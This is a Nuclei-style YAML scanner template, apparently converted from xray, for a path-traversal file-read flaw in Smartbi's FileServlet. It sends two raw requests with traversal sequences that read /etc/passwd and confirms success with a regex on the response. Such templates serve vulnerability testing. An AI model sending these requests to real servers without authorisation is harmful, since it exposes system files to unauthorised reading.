id: yaml-poc-smartbi-smartbi_bi-readfile-CT-649451

info:
  name: yaml-poc-smartbi-smartbi_bi-readfile-CT-649451
  author: haiqing.chen
  severity: high
  tags: xray-converted,lfi

http:
  - raw:
      - |
        GET /vision/FileServlet?ftpType=out&path=upload/../../../../../../../../../../etc/passwd&name=f24e09e9-f970-7c61-dcf4-491b2ed7838c.docx HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        part: body
        regex:
          - "root:.*?:[0-9]*:[0-9]*:"
  - raw:
      - |
        GET /smartbi/vision/FileServlet?ftpType=out&path=upload/../../../../../../../../../../etc/passwd&name=f24e09e9-f970-7c61-dcf4-491b2ed7838c.docx HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        part: body
        regex:
          - "root:.*?:[0-9]*:[0-9]*:"